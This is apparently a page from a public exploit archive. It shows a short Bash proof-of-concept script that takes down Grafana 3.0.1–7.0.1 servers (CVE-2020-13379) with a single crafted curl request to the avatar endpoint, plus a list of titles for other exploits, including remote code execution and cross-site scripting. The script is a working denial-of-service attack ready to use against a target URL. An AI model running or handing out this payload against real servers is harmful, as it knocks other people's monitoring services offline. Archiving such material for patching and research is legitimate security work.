
7 changes to exploits/shellcodes Frigate 2.02 - Denial Of Service (PoC) Fire Web Server 0.1 - Remote Denial of Service (PoC) Grafana 7.0.1 - Denial of Service (PoC) File Management System 1.1 - Persistent Cross-Site Scripting RiteCMS 2.2.1 - Authenticated Remote Code Execution RSA IG&L Aveksa 7.1.1 - Remote Code Execution Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
16 lines
No EOL
495 B
Bash
Executable file
16 lines
No EOL
495 B
Bash
Executable file
# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
|
|
# Date: 2020-05-23
|
|
# Exploit Author: mostwanted002
|
|
# Vendor Homepage: https://grafana.com/
|
|
# Software Link: https://grafana.com/grafana/download
|
|
# Version: 3.0.1 - 7.0.1
|
|
# Tested on: Linux
|
|
# CVE : CVE-2020-13379
|
|
|
|
#!/bin/bash
|
|
|
|
if [[ $1 != "" ]]; then
|
|
curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
|
|
else
|
|
echo "Usage: grafana-dos.sh <TARGET>. Example: grafana-dos.sh http://localhost:3000"
|
|
fi |